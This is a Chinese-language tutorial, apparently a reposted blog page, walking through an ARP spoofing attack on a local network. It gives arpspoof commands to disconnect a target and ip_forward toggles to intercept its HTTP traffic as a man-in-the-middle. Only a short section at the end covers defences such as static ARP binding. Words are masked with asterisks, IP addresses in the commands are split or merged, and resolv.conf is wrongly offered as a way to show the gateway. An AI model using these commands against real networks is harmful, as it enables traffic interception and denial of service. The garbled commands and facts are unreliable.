區域網內的攻擊 Arp欺騙

在區域網中，網路中實際傳輸的是「幀」，幀裡面是有目標主機的mac位址的。在乙太網中，乙個主機要和另乙個主機進行直接通訊，必須要知道目標主機的mac位址。mac位址就是arp協議獲得的。其實就是主機在傳送幀前將目標ip位址轉換成目標mac位址的過程。arp協議的基本功能就是通過目標裝置的ip位址，查詢目標裝置的mac位址，以保證通訊的順利進行。所以說從某種意義上講arp協議是工作在更低於ip協議的協議層。這也是為什麼arp欺騙更能夠讓人在神不知鬼不覺的情況下出現網路故障，危害會很隱蔽。

arp攻擊就是通過偽造ip位址和mac位址實現arp欺騙，能夠在網路中產生大量的arp通訊量，攻擊者只要持續不斷的發出偽造的arp響應包就能更改目標主機arp快取中的ip-mac條目，造成網路中斷或中間人攻擊。

當區域網中一台機器，反覆向其他機器，特別是向閘道器，傳送這樣無效假冒的arp應答資訊包時，嚴重的網路堵塞就會開始。由於閘道器mac位址錯誤，所以從網路中計算機發來的資料無法正常發到閘道器，自然無法正常上網。這就造成了無法訪問外網的問題，由於很多時候閘道器還控制著我們的區域網lan上網，所以這時我們的lan訪問也就出現問題了。

可以使用nmap命令尋找存活主機

也可以使用fping探測一下

使用命令檢視一下當前的閘道器

cat /etc/resolv.conf

下面開始斷網攻擊，使用arpspoof工具，工具使用方法：

arpspoof   -i   網絡卡   -t    目標ip    閘道器

export path= "/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"

linux修改環境變數

開啟斷網攻擊

arpspoof -i eth0 -t 192.168 .186 .131 192.168 .186

.2

arp欺騙攻擊是冒充閘道器向目標主機傳送假的arp資料報。

攻擊流程

獲取目標主機的流量

獲取流量之後進行**

相當於乙個中間人，可以在中途攔截一下流量，這樣所有的流量都會被監控，

開啟ip**功能

cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward**發） #echo 代表寫入這樣可以實現流量**，而不是截斷流量如果要截斷流量，寫入0即可 #截斷流量 echo 0 > /proc/sys/net/ipv4/ip_forward（斷網）

欺騙攻擊

arpspoof -i eth0 -t 192.168 .186 .2192.168 .186 .131 #閘道器在前，ip在後

接下來開啟另乙個終端，使用一下

經過測試，只能捕捉目標主機在瀏覽http**的時候可以攔截流量，訪問https則不行。

這裡稍微補充一下http和https

http是一種發布和接收 html 頁面的方法，被用於在 web 瀏覽器和**伺服器之間傳遞資訊。

http 協議以明文方式傳送內容，不提供任何方式的資料加密，如果攻擊者擷取了web瀏覽器和**伺服器之間的傳輸報文，就可以直接讀懂其中的資訊。

https 經由 http 進行通訊，但利用 ssl/tls 來加密資料報。https 開發的主要目的，是提供對**伺服器的身份認證，保護交換資料的隱私與完整性。

https（ssl+http）資料傳輸過程是加密的，安全性較好。

在arp快取記憶體中的表項一般都要設定超時值，縮短這個這個超時值能夠有用的避免arp表的溢位。

每台主機都有乙個暫時寄存ip-mac的對應表arp攻擊就經過更改這個快取來到達詐騙的意圖，運用靜態的arp來繫結正確的mac是乙個有用的辦法，在命令列下運用arp -a能夠檢查當時的arp快取表。

在某個正常的時間，做乙個ip和mac對應的資料庫，以後定時檢查當時的ip和mac對應聯絡是否正常，定時檢查交流機的流量列表，檢查丟包率。

區域網內的攻擊 Arp欺騙

區域網內ARP中間人攻擊

ARP欺騙攻擊

ARP欺騙攻擊

區域網內的攻擊 Arp欺騙

區域網內ARP中間人攻擊

ARP欺騙攻擊

ARP欺騙攻擊

相關推薦